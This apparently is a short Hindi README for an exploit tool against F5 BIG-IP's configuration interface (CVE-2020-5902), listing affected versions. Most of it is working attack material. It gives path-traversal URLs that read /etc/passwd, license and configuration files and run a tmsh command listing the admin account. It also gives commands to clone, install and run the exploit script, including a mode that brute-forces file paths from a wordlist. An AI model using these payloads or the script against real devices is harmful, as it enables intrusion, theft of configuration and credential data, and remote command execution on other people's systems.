
F5-Big-IP (CVE-2020-5902) के लिए शोषण कोड
F5-Big-IP (CVE-2020-5902) के लिए एक्सप्लॉइट कोड
BIG-IP संस्करण 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, और 11.6.1-11.6.5.1 में, ट्रैफ़िक मैनेजमेंट यूज़र इंटरफ़ेस (TMUI), जिसे कॉन्फ़िगरेशन यूटिलिटी भी कहा जाता है, में अज्ञात पृष्ठों पर एक रिमोट कोड एक्सीक्यूशन (RCE) कमज़ोरी है।
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
$ git clone https://github.com/yasserjanah/CVE-2020-5902
$ cd CVE-2020-5902/
$ pip3 install -r ./requirements.txt
$ python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b वर्डलिस्ट से फ़ाइलों को ब्रूट फोर्स करने के लिए
$ python3 exploit-CVE-2020-5902.py -ip <IP> -b